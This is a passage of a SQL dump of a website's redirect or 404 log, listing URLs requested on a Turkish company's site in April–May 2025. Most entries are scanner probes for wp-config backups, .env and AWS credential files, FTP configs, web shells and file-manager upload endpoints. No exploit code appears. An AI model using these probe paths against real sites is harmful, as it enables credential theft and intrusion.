00:00:00',301),(39739,'http://3s-technologies.com.tr/tr/public/file-manager/tinymce',NULL,'','',1,0,'2025-04-29 01:33:05','0000-00-00 00:00:00',301),(39740,'http://3s-technologies.com.tr/tr/laravel-file-manager/tinymce',NULL,'','',1,0,'2025-04-29 01:33:06','0000-00-00 00:00:00',301),(39741,'http://3s-technologies.com.tr/tr/public/laravel-file-manager/tinymce',NULL,'','',1,0,'2025-04-29 01:33:07','0000-00-00 00:00:00',301),(39742,'http://3s-technologies.com.tr/tr/wp-config.php1',NULL,'','',3,0,'2025-04-29 03:28:32','0000-00-00 00:00:00',301),(39743,'http://3s-technologies.com.tr/tr/wp-config.php.pack',NULL,'','',1,0,'2025-04-29 03:28:34','0000-00-00 00:00:00',301),(39744,'http://www.3s-technologies.com.tr/tr/admin/js/kcfinder/upload.php',NULL,'','',1,0,'2025-04-29 04:34:48','0000-00-00 00:00:00',301),(39745,'http://www.3s-technologies.com.tr/tr/backend/kcfinder/upload.php',NULL,'','',1,0,'2025-04-30 07:54:50','0000-00-00 00:00:00',301),(39746,'http://www.3s-technologies.com.tr/tr/assets/plugins/kcfinder/upload.php',NULL,'','',1,0,'2025-04-30 07:54:52','0000-00-00 00:00:00',301),(39747,'http://www.3s-technologies.com.tr/tr/assets/js/kcfinder/upload.php',NULL,'','',1,0,'2025-04-30 07:54:52','0000-00-00 00:00:00',301),(39748,'http://www.3s-technologies.com.tr/tr/admin/plugins/kcfinder/upload.php',NULL,'','',1,0,'2025-04-30 07:55:06','0000-00-00 00:00:00',301),(39749,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/by,mf_name?language=tr-tr',NULL,'','',1,0,'2025-04-30 15:22:09','0000-00-00 00:00:00',301),(39750,'http://3s-technologies.com.tr/tr/xml',NULL,'','',2,0,'2025-04-30 16:22:09','0000-00-00 00:00:00',301),(39751,'http://3s-technologies.com.tr/tr/wp-config.phpold',NULL,'','',2,0,'2025-04-30 23:18:13','0000-00-00 00:00:00',301),(39752,'http://3s-technologies.com.tr/tr/wp-config.php.org',NULL,'','',2,0,'2025-05-01 01:03:06','0000-00-00 00:00:00',301),(39753,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/by,product_name?language=tr-tr',NULL,'','',1,0,'2025-05-02 14:24:33','0000-00-00 00:00:00',301),(39754,'http://3s-technologies.com.tr/tr/wp-config.php-old',NULL,'','',1,0,'2025-05-03 08:50:19','0000-00-00 00:00:00',301),(39755,'http://3s-technologies.com.tr/tr/wp-config.php_old',NULL,'','',2,0,'2025-05-03 08:50:21','0000-00-00 00:00:00',301),(39756,'http://3s-technologies.com.tr/tr/wp-content/uploads/alm_templates/alfa_data/alfacgiapi',NULL,'http://3s-technologies.com.tr/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/','',1,0,'2025-05-03 11:02:59','0000-00-00 00:00:00',301),(39757,'http://3s-technologies.com.tr/tr/wp/alfa_data/alfacgiapi',NULL,'http://3s-technologies.com.tr/wp/ALFA_DATA/alfacgiapi/','',3,0,'2025-05-03 11:06:26','0000-00-00 00:00:00',301),(39758,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lfs-1-detail?tmpl=component&print=1',NULL,'','',1,0,'2025-05-03 23:47:07','0000-00-00 00:00:00',301),(39759,'https://3s-technologies.com.tr/tr/*',NULL,'','',2,0,'2025-05-04 14:43:22','0000-00-00 00:00:00',301),(39760,'https://3s-technologies.com.tr/tr/wp-config.php.save',NULL,'https://3s-technologies.com.tr/wp-config.php.save','',1,0,'2025-05-05 16:38:03','0000-00-00 00:00:00',301),(39761,'https://3s-technologies.com.tr/tr/wp-config.bak',NULL,'https://3s-technologies.com.tr/wp-config.bak','',2,0,'2025-05-05 16:38:04','0000-00-00 00:00:00',301),(39762,'https://3s-technologies.com.tr/tr/wp-config.old',NULL,'https://3s-technologies.com.tr/wp-config.old','',2,0,'2025-05-05 16:38:06','0000-00-00 00:00:00',301),(39763,'https://3s-technologies.com.tr/tr/wp-config.backup',NULL,'https://3s-technologies.com.tr/wp-config.backup','',1,0,'2025-05-05 16:38:07','0000-00-00 00:00:00',301),(39764,'https://3s-technologies.com.tr/tr/wp-config.php.orig',NULL,'https://3s-technologies.com.tr/wp-config.php.orig','',1,0,'2025-05-05 16:38:09','0000-00-00 00:00:00',301),(39765,'http://3s-technologies.com.tr/tr/wp-content/themes/themes/cyb3r.php',NULL,'','',1,0,'2025-05-05 20:28:08','0000-00-00 00:00:00',301),(39766,'http://3s-technologies.com.tr/tr/wp-content/plugins/plugins/cyb3r.php',NULL,'','',1,0,'2025-05-05 20:28:11','0000-00-00 00:00:00',301),(39767,'http://3s-technologies.com.tr/tr/wp-config.php_bk',NULL,'','',1,0,'2025-05-06 11:09:17','0000-00-00 00:00:00',301),(39768,'http://3s-technologies.com.tr/tr/wp-config.php-bk',NULL,'','',1,0,'2025-05-06 11:09:28','0000-00-00 00:00:00',301),(39769,'http://3s-technologies.com.tr/tr/wp-config.php-orig',NULL,'','',1,0,'2025-05-06 11:51:31','0000-00-00 00:00:00',301),(39770,'http://3s-technologies.com.tr/tr/wp-config.php_orig',NULL,'','',1,0,'2025-05-06 11:51:36','0000-00-00 00:00:00',301),(39771,'http://3s-technologies.com.tr/tr/wp-config.php-new',NULL,'','',1,0,'2025-05-06 18:32:14','0000-00-00 00:00:00',301),(39772,'http://3s-technologies.com.tr/tr/wp-config.php_new',NULL,'','',1,0,'2025-05-06 18:32:19','0000-00-00 00:00:00',301),(39773,'https://3s-technologies.com.tr/tr/wood-processing-ahåÿap-iåÿleme/mdf-iåÿleme-mdf-processing?language=tr-tr',NULL,'','',1,0,'2025-05-06 20:31:01','0000-00-00 00:00:00',301),(39774,'http://3s-technologies.com.tr/tr/files/home.php',NULL,'','',3,0,'2025-05-08 05:17:57','0000-00-00 00:00:00',301),(39775,'https://3s-technologies.com.tr/tr/sitemap-news.xml',NULL,'','',3,0,'2025-05-08 23:10:35','0000-00-00 00:00:00',301),(39776,'https://3s-technologies.com.tr/tr/sitemap-news.xml.gz',NULL,'','',2,0,'2025-05-08 23:10:37','0000-00-00 00:00:00',301),(39777,'https://3s-technologies.com.tr/tr/sitemap-index.xml.gz',NULL,'','',2,0,'2025-05-08 23:10:42','0000-00-00 00:00:00',301),(39778,'https://3s-technologies.com.tr/tr/sitemap_news.xml',NULL,'','',3,0,'2025-05-08 23:10:43','0000-00-00 00:00:00',301),(39779,'https://3s-technologies.com.tr/tr/sitemap-index.xml',NULL,'','',5,0,'2025-05-08 23:10:45','0000-00-00 00:00:00',301),(39780,'https://3s-technologies.com.tr/tr/sitemap_news.xml.gz',NULL,'','',2,0,'2025-05-08 23:10:47','0000-00-00 00:00:00',301),(39781,'https://3s-technologies.com.tr/tr/sitemap/sitemap-index.xml',NULL,'','',2,0,'2025-05-08 23:10:48','0000-00-00 00:00:00',301),(39782,'https://3s-technologies.com.tr/tr/admin/config/search/xmlsitemap',NULL,'','',2,0,'2025-05-08 23:10:50','0000-00-00 00:00:00',301),(39783,'https://3s-technologies.com.tr/tr/.sitemap.xml',NULL,'','',2,0,'2025-05-08 23:10:53','0000-00-00 00:00:00',301),(39784,'http://3s-technologies.com.tr/en/wp-content/plugins/hellodollyv2/hello_dolly_v2.php',NULL,'www.google.com','',1,0,'2025-05-11 07:55:36','0000-00-00 00:00:00',301),(39785,'http://3s-technologies.com.tr/en/ss.php?f_c=1',NULL,'','',1,0,'2025-05-11 09:35:08','0000-00-00 00:00:00',301),(39786,'https://3s-technologies.com.tr/en/llms.txt',NULL,'','',28,0,'2025-05-11 13:59:45','0000-00-00 00:00:00',301),(39787,'https://www.3s-technologies.com.tr/tr/login.php?s=admin/login',NULL,'','',1,0,'2025-05-12 00:15:28','0000-00-00 00:00:00',301),(39788,'https://3s-technologies.com.tr/tr/modules/mod_ccnewsletter/mod_ccnewsletter.xml',NULL,'','',1,0,'2025-05-13 07:33:06','0000-00-00 00:00:00',301),(39789,'http://3s-technologies.com.tr/tr/log-mama/function.php',NULL,'','',3,0,'2025-05-13 12:38:14','0000-00-00 00:00:00',301),(39790,'https://3s-technologies.com.tr/tr/.ftpconfig.save',NULL,'https://3s-technologies.com.tr/.ftpconfig.save','',2,0,'2025-05-13 15:21:56','0000-00-00 00:00:00',301),(39791,'https://3s-technologies.com.tr/tr/.ftpconfig~',NULL,'https://3s-technologies.com.tr/.ftpconfig~','',2,0,'2025-05-13 15:22:01','0000-00-00 00:00:00',301),(39792,'https://3s-technologies.com.tr/tr/.vscode/sftp.json.save',NULL,'https://3s-technologies.com.tr/.vscode/sftp.json.save','',2,0,'2025-05-13 15:22:05','0000-00-00 00:00:00',301),(39793,'https://3s-technologies.com.tr/tr/.vscode/sftp.json~',NULL,'https://3s-technologies.com.tr/.vscode/sftp.json~','',2,0,'2025-05-13 15:22:08','0000-00-00 00:00:00',301),(39794,'https://3s-technologies.com.tr/tr/.vscode/ftp-sync.json.save',NULL,'https://3s-technologies.com.tr/.vscode/ftp-sync.json.save','',2,0,'2025-05-13 15:22:11','0000-00-00 00:00:00',301),(39795,'https://3s-technologies.com.tr/tr/.vscode/ftp-sync.json~',NULL,'https://3s-technologies.com.tr/.vscode/ftp-sync.json~','',2,0,'2025-05-13 15:22:16','0000-00-00 00:00:00',301),(39796,'https://3s-technologies.com.tr/tr/auth.json',NULL,'https://3s-technologies.com.tr/auth.json','',1,0,'2025-05-13 21:47:35','0000-00-00 00:00:00',301),(39797,'https://3s-technologies.com.tr/tr/hardhat.config.js',NULL,'https://3s-technologies.com.tr/hardhat.config.js','',1,0,'2025-05-13 21:47:35','0000-00-00 00:00:00',301),(39798,'https://3s-technologies.com.tr/tr/_profiler/empty/search/results?limit=10',NULL,'https://3s-technologies.com.tr/_profiler/empty/search/results?limit=10','',1,0,'2025-05-13 21:47:35','0000-00-00 00:00:00',301),(39799,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/tolo/smd-fä±rä±n?language=tr-tr',NULL,'','',1,0,'2025-05-14 00:52:42','0000-00-00 00:00:00',301),(39800,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/tolo/smd-fä±rä±n/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-05-14 04:02:18','0000-00-00 00:00:00',301),(39801,'http://3s-technologies.com.tr/tr/cgi-bin/index.php',NULL,'','',66,0,'2025-05-14 14:20:51','0000-00-00 00:00:00',301),(39802,'http://3s-technologies.com.tr/tr/wp-customizer-admin.php',NULL,'','',1,0,'2025-05-16 10:21:10','0000-00-00 00:00:00',301),(39803,'http://3s-technologies.com.tr/tr/ynz.php7',NULL,'','',21,0,'2025-05-16 10:21:16','0000-00-00 00:00:00',301),(39804,'http://3s-technologies.com.tr/tr/erin1.php7',NULL,'','',34,0,'2025-05-16 10:21:18','0000-00-00 00:00:00',301),(39805,'http://3s-technologies.com.tr/tr/.wp-cli/wp-login.php',NULL,'','',13,0,'2025-05-16 10:21:29','0000-00-00 00:00:00',301),(39806,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp-login.php',NULL,'','',33,0,'2025-05-16 10:21:30','0000-00-00 00:00:00',301),(39807,'http://3s-technologies.com.tr/tr/tmpls.php',NULL,'','',22,0,'2025-05-16 10:21:51','0000-00-00 00:00:00',301),(39808,'http://3s-technologies.com.tr/tr/wp-admin/css/ysirlifn.php',NULL,'','',1,0,'2025-05-16 10:22:10','0000-00-00 00:00:00',301),(39809,'http://3s-technologies.com.tr/tr/ofso64.php',NULL,'','',1,0,'2025-05-16 10:22:20','0000-00-00 00:00:00',301),(39810,'http://3s-technologies.com.tr/tr/wp-content/plugins/topxhoh/wdr.php',NULL,'','',1,0,'2025-05-16 10:22:22','0000-00-00 00:00:00',301),(39811,'http://3s-technologies.com.tr/tr/wp-content/plugins/ioptimize.php?rchk',NULL,'','',1,0,'2025-05-16 10:22:23','0000-00-00 00:00:00',301),(39812,'http://3s-technologies.com.tr/tr/wp-content/uploads/2017-------/09/wp-console.php',NULL,'','',2,0,'2025-05-16 10:22:29','0000-00-00 00:00:00',301),(39813,'http://3s-technologies.com.tr/tr/wp-includes/js/crop/uword.php',NULL,'','',2,0,'2025-05-16 10:22:30','0000-00-00 00:00:00',301),(39814,'http://3s-technologies.com.tr/tr/wp-content/themes/bltm/wp-login.php',NULL,'','',6,0,'2025-05-16 10:22:32','0000-00-00 00:00:00',301),(39815,'http://3s-technologies.com.tr/tr/wp-content/uploads/2014/07/olx.php',NULL,'','',2,0,'2025-05-16 10:22:35','0000-00-00 00:00:00',301),(39816,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/index.php',NULL,'','',2,0,'2025-05-16 10:22:38','0000-00-00 00:00:00',301),(39817,'http://3s-technologies.com.tr/tr/wp-content/uploads/2020/wp-couldent.php.suspected',NULL,'','',2,0,'2025-05-16 10:22:38','0000-00-00 00:00:00',301),(39818,'http://3s-technologies.com.tr/tr/wp-content/plugins/523453244/ninja.php',NULL,'','',2,0,'2025-05-16 10:22:41','0000-00-00 00:00:00',301),(39819,'http://3s-technologies.com.tr/tr/wp-includes/js/imgareaselect/index.php',NULL,'','',2,0,'2025-05-16 10:22:45','0000-00-00 00:00:00',301),(39820,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/load.php',NULL,'','',2,0,'2025-05-16 10:22:47','0000-00-00 00:00:00',301),(39821,'http://3s-technologies.com.tr/en/wp-content/plugins/iwjob/assets/css/style.css',NULL,'','',1,0,'2025-05-16 10:55:43','0000-00-00 00:00:00',301),(39822,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-05-17 04:52:16','0000-00-00 00:00:00',301),(39823,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/spr-20-detail',NULL,'','',1,0,'2025-05-17 06:59:35','0000-00-00 00:00:00',301),(39824,'http://3s-technologies.com.tr/en/network_xo.php',NULL,'','',7,0,'2025-05-17 12:14:23','0000-00-00 00:00:00',301),(39825,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/by,mf_name?language=tr-tr',NULL,'','',1,0,'2025-05-18 21:54:49','0000-00-00 00:00:00',301),(39826,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cnc/by,category_name?language=tr-tr',NULL,'','',1,0,'2025-05-19 02:21:23','0000-00-00 00:00:00',301),(39827,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cnc/by,product_name?language=tr-tr',NULL,'','',1,0,'2025-05-19 03:37:38','0000-00-00 00:00:00',301),(39828,'http://3s-technologies.com.tr/tr/config/configuration.yml?type=rau',NULL,'http://3s-technologies.com.tr/config/configuration.yml?type=rau','',1,0,'2025-05-19 08:40:27','0000-00-00 00:00:00',301),(39829,'http://3s-technologies.com.tr/tr/config/databases.yml?type=rau',NULL,'http://3s-technologies.com.tr/config/databases.yml?type=rau','',1,0,'2025-05-19 08:41:02','0000-00-00 00:00:00',301),(39830,'http://3s-technologies.com.tr/tr/application.properties?type=rau',NULL,'http://3s-technologies.com.tr/application.properties?type=rau','',1,0,'2025-05-19 08:41:30','0000-00-00 00:00:00',301),(39831,'http://3s-technologies.com.tr/tr/etc/postfix/main.cf?type=rau',NULL,'http://3s-technologies.com.tr/etc/postfix/main.cf?type=rau','',1,0,'2025-05-19 08:42:00','0000-00-00 00:00:00',301),(39832,'http://3s-technologies.com.tr/tr/sites/default/settings.php?type=rau',NULL,'http://3s-technologies.com.tr/sites/default/settings.php?type=rau','',1,0,'2025-05-19 08:42:21','0000-00-00 00:00:00',301),(39833,'http://3s-technologies.com.tr/tr/settings.py?type=rau',NULL,'http://3s-technologies.com.tr/settings.py?type=rau','',1,0,'2025-05-19 08:42:38','0000-00-00 00:00:00',301),(39834,'http://3s-technologies.com.tr/tr/etc/mail/sendmail.cf?type=rau',NULL,'http://3s-technologies.com.tr/etc/mail/sendmail.cf?type=rau','',1,0,'2025-05-19 08:42:59','0000-00-00 00:00:00',301),(39835,'http://3s-technologies.com.tr/tr/mailer.ini?type=rau',NULL,'http://3s-technologies.com.tr/mailer.ini?type=rau','',1,0,'2025-05-19 08:43:12','0000-00-00 00:00:00',301),(39836,'http://3s-technologies.com.tr/tr/var/www/html/uploads',NULL,'','',8,0,'2025-05-19 22:50:37','0000-00-00 00:00:00',301),(39837,'http://3s-technologies.com.tr/tr/var/www/html/files',NULL,'','',2,0,'2025-05-19 22:50:38','0000-00-00 00:00:00',301),(39838,'http://3s-technologies.com.tr/tr/var/www/html/images',NULL,'','',2,0,'2025-05-19 22:50:39','0000-00-00 00:00:00',301),(39839,'http://3s-technologies.com.tr/tr/usr/share/nginx/html',NULL,'','',2,0,'2025-05-19 22:50:40','0000-00-00 00:00:00',301),(39840,'http://3s-technologies.com.tr/tr/opt/lampp/htdocs',NULL,'','',2,0,'2025-05-19 22:50:40','0000-00-00 00:00:00',301),(39841,'http://3s-technologies.com.tr/tr/joomla/images',NULL,'','',2,0,'2025-05-19 22:50:42','0000-00-00 00:00:00',301),(39842,'http://3s-technologies.com.tr/tr/joomla/tmp',NULL,'','',2,0,'2025-05-19 22:50:42','0000-00-00 00:00:00',301),(39843,'http://3s-technologies.com.tr/tr/drupal/sites/default/files',NULL,'','',2,0,'2025-05-19 22:50:43','0000-00-00 00:00:00',301),(39844,'http://3s-technologies.com.tr/tr/drupal/modules',NULL,'','',2,0,'2025-05-19 22:50:44','0000-00-00 00:00:00',301),(39845,'http://3s-technologies.com.tr/tr/drupal/themes',NULL,'','',2,0,'2025-05-19 22:50:45','0000-00-00 00:00:00',301),(39846,'http://3s-technologies.com.tr/tr/justbrain.php',NULL,'','',1,0,'2025-05-19 22:50:51','0000-00-00 00:00:00',301),(39847,'http://3s-technologies.com.tr/tr/backup/.config.php',NULL,'','',2,0,'2025-05-19 22:50:58','0000-00-00 00:00:00',301),(39848,'http://3s-technologies.com.tr/tr/templates/beez3/shell.php',NULL,'','',2,0,'2025-05-19 22:51:05','0000-00-00 00:00:00',301),(39849,'http://3s-technologies.com.tr/tr/uploads/shell.php5',NULL,'','',2,0,'2025-05-19 22:51:06','0000-00-00 00:00:00',301),(39850,'http://3s-technologies.com.tr/tr/wp-admin/images',NULL,'','',90,0,'2025-05-19 22:51:08','0000-00-00 00:00:00',301),(39851,'http://3s-technologies.com.tr/tr/wp-admin/js/farbtastic.php',NULL,'','',2,0,'2025-05-19 22:51:09','0000-00-00 00:00:00',301),(39852,'http://3s-technologies.com.tr/tr/wp-admin/maint',NULL,'','',124,0,'2025-05-19 22:51:11','0000-00-00 00:00:00',301),(39853,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins-old',NULL,'','',32,0,'2025-05-19 22:51:19','0000-00-00 00:00:00',301),(39854,'http://3s-technologies.com.tr/tr/wp-content/plugins/shell.php',NULL,'','',2,0,'2025-05-19 22:51:22','0000-00-00 00:00:00',301),(39855,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/lib/files/shell.php',NULL,'','',2,0,'2025-05-19 22:51:23','0000-00-00 00:00:00',301),(39856,'http://3s-technologies.com.tr/tr/wp-includes/simplepie',NULL,'','',146,0,'2025-05-19 22:51:31','0000-00-00 00:00:00',301),(39857,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/content/type',NULL,'','',25,0,'2025-05-19 22:51:32','0000-00-00 00:00:00',301),(39858,'http://3s-technologies.com.tr/tr/wp-includes/text/diff',NULL,'','',71,0,'2025-05-19 22:51:33','0000-00-00 00:00:00',301),(39859,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine',NULL,'','',61,0,'2025-05-19 22:51:34','0000-00-00 00:00:00',301),(39860,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/renderer',NULL,'','',83,0,'2025-05-19 22:51:36','0000-00-00 00:00:00',301),(39861,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns',NULL,'','',48,0,'2025-05-19 22:51:38','0000-00-00 00:00:00',301),(39862,'http://3s-technologies.com.tr/tr/wp-includes/blocks',NULL,'','',74,0,'2025-05-19 22:51:40','0000-00-00 00:00:00',301),(39863,'http://3s-technologies.com.tr/tr/wp-includes/certificates',NULL,'','',75,0,'2025-05-19 22:51:41','0000-00-00 00:00:00',301),(39864,'http://3s-technologies.com.tr/tr/wp-includes/customize',NULL,'','',75,0,'2025-05-19 22:51:45','0000-00-00 00:00:00',301),(39865,'http://3s-technologies.com.tr/tr/wp-includes/fonts',NULL,'','',85,0,'2025-05-19 22:51:47','0000-00-00 00:00:00',301),(39866,'http://3s-technologies.com.tr/tr/wp-includes/html-api',NULL,'','',76,0,'2025-05-19 22:51:48','0000-00-00 00:00:00',301),(39867,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies',NULL,'','',45,0,'2025-05-19 22:51:49','0000-00-00 00:00:00',301),(39868,'http://3s-technologies.com.tr/tr/wp-includes/random_compat',NULL,'','',23,0,'2025-05-19 22:51:51','0000-00-00 00:00:00',301),(39869,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/fields',NULL,'','',65,0,'2025-05-19 22:51:53','0000-00-00 00:00:00',301),(39870,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/search',NULL,'','',60,0,'2025-05-19 22:51:54','0000-00-00 00:00:00',301),(39871,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps',NULL,'','',44,0,'2025-05-19 22:51:55','0000-00-00 00:00:00',301),(39872,'http://3s-technologies.com.tr/tr/php_info.php',NULL,'http://3s-technologies.com.tr/php_info.php','',22,0,'2025-05-20 08:22:14','0000-00-00 00:00:00',301),(39873,'http://3s-technologies.com.tr/tr/config.phpinfo',NULL,'http://3s-technologies.com.tr/config.phpinfo','',14,0,'2025-05-20 08:22:16','0000-00-00 00:00:00',301),(39874,'http://3s-technologies.com.tr/tr/admin/phpinfo.php',NULL,'http://3s-technologies.com.tr/admin/phpinfo.php','',17,0,'2025-05-20 08:22:16','0000-00-00 00:00:00',301),(39875,'http://3s-technologies.com.tr/tr/phpinfo2.php',NULL,'http://3s-technologies.com.tr/phpinfo2.php','',13,0,'2025-05-20 08:22:18','0000-00-00 00:00:00',301),(39876,'http://3s-technologies.com.tr/tr/php_version.php',NULL,'http://3s-technologies.com.tr/php_version.php','',16,0,'2025-05-20 08:22:18','0000-00-00 00:00:00',301),(39877,'http://3s-technologies.com.tr/tr/server-info.php',NULL,'http://3s-technologies.com.tr/server-info.php','',16,0,'2025-05-20 08:22:19','0000-00-00 00:00:00',301),(39878,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-05-20 20:49:28','0000-00-00 00:00:00',301),(39879,'https://3s-technologies.com.tr/_ignition/execute-solution',NULL,'','',24,0,'2025-05-21 06:57:50','0000-00-00 00:00:00',301),(39880,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/by,category_name?language=tr-tr',NULL,'','',1,0,'2025-05-21 19:12:05','0000-00-00 00:00:00',301),(39881,'http://www.3s-technologies.com.tr/tr/admin/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2025-05-22 01:57:07','0000-00-00 00:00:00',301),(39882,'http://www.3s-technologies.com.tr/tr/admin/tinymce/filemanager/dialog.php',NULL,'','',1,0,'2025-05-22 01:57:11','0000-00-00 00:00:00',301),(39883,'https://3s-technologies.com.tr/tr/index.html',NULL,'','',3,0,'2025-05-23 02:45:27','0000-00-00 00:00:00',301),(39884,'http://3s-technologies.com.tr/tr/sites/all/modules/elfinder/elfinder.html',NULL,'','',2,0,'2025-05-23 06:36:56','0000-00-00 00:00:00',301),(39885,'http://3s-technologies.com.tr/tr/js/elfinder/php/connector.php',NULL,'','',4,0,'2025-05-24 01:25:03','0000-00-00 00:00:00',301),(39886,'http://3s-technologies.com.tr/en/wp-content/plugins/suretriggers/readme.txt',NULL,'www.google.com','',1,0,'2025-05-24 20:07:23','0000-00-00 00:00:00',301),(39887,'http://3s-technologies.com.tr/tr/sites/all/libraries/elfinder-1.2/connectors/php/connector.php',NULL,'','',1,0,'2025-05-25 01:43:47','0000-00-00 00:00:00',301),(39888,'https://3s-technologies.com.tr/tr/wp-content/plugins/hellodollyv2/hello_dolly_v2.php',NULL,'https://3s-technologies.com.tr/wp-content/plugins/HelloDollyV2/hello_dolly_v2.php','',1,0,'2025-05-25 19:41:19','0000-00-00 00:00:00',301),(39889,'https://3s-technologies.com.tr/tr/wp-content/themes/hello_dolly_v2.php',NULL,'https://3s-technologies.com.tr/wp-content/themes/hello_dolly_v2.php','',1,0,'2025-05-25 19:41:21','0000-00-00 00:00:00',301),(39890,'https://3s-technologies.com.tr/tr/wp-content/plugins/hellodollyv2-1/hello_dolly_v2.php',NULL,'https://3s-technologies.com.tr/wp-content/plugins/HelloDollyV2-1/hello_dolly_v2.php','',1,0,'2025-05-25 19:41:22','0000-00-00 00:00:00',301),(39891,'http://3s-technologies.com.tr/tr/js/elfinder/php/connector.minimal.php',NULL,'','',3,0,'2025-05-26 01:21:03','0000-00-00 00:00:00',301),(39892,'http://3s-technologies.com.tr/en//wp-admin/css/autoload_classmap.php',NULL,'','',5,0,'2025-05-26 02:15:29','0000-00-00 00:00:00',301),(39893,'http://3s-technologies.com.tr/en//wp-admin/images/autoload_classmap.php',NULL,'','',5,0,'2025-05-26 02:15:31','0000-00-00 00:00:00',301),(39894,'http://3s-technologies.com.tr/en//wp-includes/pomo/autoload_classmap.php',NULL,'','',4,0,'2025-05-26 02:15:33','0000-00-00 00:00:00',301),(39895,'http://3s-technologies.com.tr/en//wp-includes/block-patterns/autoload_classmap.php',NULL,'','',4,0,'2025-05-26 02:15:34','0000-00-00 00:00:00',301),(39896,'http://3s-technologies.com.tr/en//wp-includes/js/autoload_classmap.php',NULL,'','',4,0,'2025-05-26 02:15:36','0000-00-00 00:00:00',301),(39897,'http://3s-technologies.com.tr/en//wp-includes/sitemaps/autoload_classmap.php',NULL,'','',4,0,'2025-05-26 02:15:38','0000-00-00 00:00:00',301),(39898,'http://3s-technologies.com.tr/en//wp-includes/simplepie/autoload_classmap.php',NULL,'','',4,0,'2025-05-26 02:15:40','0000-00-00 00:00:00',301),(39899,'http://3s-technologies.com.tr/en//wp-includes/widgets/autoload_classmap.php',NULL,'','',4,0,'2025-05-26 02:15:41','0000-00-00 00:00:00',301),(39900,'http://3s-technologies.com.tr/en//wp-content/uploads/autoload_classmap.php',NULL,'','',4,0,'2025-05-26 02:15:42','0000-00-00 00:00:00',301),(39901,'https://3s-technologies.com.tr/wp-json/sure-triggers/v1/automation/action',NULL,'','',8,0,'2025-05-26 16:15:13','0000-00-00 00:00:00',301),(39902,'http://3s-technologies.com.tr/tr/sites/all/libraries/elfinder-1.2/src/connectors/php/connector.php',NULL,'','',2,0,'2025-05-27 00:27:12','0000-00-00 00:00:00',301),(39903,'http://3s-technologies.com.tr/tr/chosen',NULL,'','',47,0,'2025-05-27 13:45:39','0000-00-00 00:00:00',301),(39904,'http://3s-technologies.com.tr/tr/widgets.php',NULL,'','',22,0,'2025-05-27 13:45:42','0000-00-00 00:00:00',301),(39905,'http://3s-technologies.com.tr/tr/aks.php',NULL,'','',16,0,'2025-05-27 13:45:43','0000-00-00 00:00:00',301),(39906,'https://3s-technologies.com.tr/en/assets/ckfinder/ckfinder.html',NULL,'','',2,0,'2025-05-27 14:36:02','0000-00-00 00:00:00',301),(39907,'https://3s-technologies.com.tr/tr/akrilik-iåÿleme-acrylic-processing/akrilik-iåÿleme-acrylic-processing',NULL,'','',1,0,'2025-05-27 14:47:34','0000-00-00 00:00:00',301),(39908,'http://www.3s-technologies.com.tr/en/images/stories/virtuemart/product/resized/<strange-chars>',NULL,'','',31,0,'2025-05-28 06:44:42','0000-00-00 00:00:00',301),(39909,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/<strange-chars>',NULL,'','',4,0,'2025-05-28 06:47:33','0000-00-00 00:00:00',301),(39910,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/<strange-chars>',NULL,'','',21,0,'2025-05-28 06:48:51','0000-00-00 00:00:00',301),(39911,'http://3s-technologies.com.tr/tr/wp-sigunq.php',NULL,'','',56,0,'2025-05-28 09:23:45','0000-00-00 00:00:00',301),(39912,'https://www.3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-category-list?id=8&language=tr-tr',NULL,'','',1,0,'2025-05-28 15:04:35','0000-00-00 00:00:00',301),(39913,'http://3s-technologies.com.tr/tr/sites/all/libraries/elfinder-1.1/connectors/php/connector.php',NULL,'','',2,0,'2025-05-28 15:13:24','0000-00-00 00:00:00',301),(39914,'http://3s-technologies.com.tr/tr/.env.production',NULL,'','',8,0,'2025-05-28 17:32:57','0000-00-00 00:00:00',301),(39915,'http://3s-technologies.com.tr/tr/api/shared/config/config.env',NULL,'','',3,0,'2025-05-28 17:32:58','0000-00-00 00:00:00',301),(39916,'http://3s-technologies.com.tr/tr/register',NULL,'','',21,0,'2025-05-28 17:33:00','0000-00-00 00:00:00',301),(39917,'http://3s-technologies.com.tr/tr/.aws_/credentials',NULL,'','',3,0,'2025-05-28 17:33:01','0000-00-00 00:00:00',301),(39918,'http://3s-technologies.com.tr/tr/karma.conf.json',NULL,'','',3,0,'2025-05-28 17:33:02','0000-00-00 00:00:00',301),(39919,'http://3s-technologies.com.tr/tr/wp-init/wp-init/cache.php',NULL,'','',1,0,'2025-05-28 21:45:32','0000-00-00 00:00:00',301),(39920,'http://3s-technologies.com.tr/tr/crack_self_restore.php',NULL,'','',6,0,'2025-05-29 02:47:52','0000-00-00 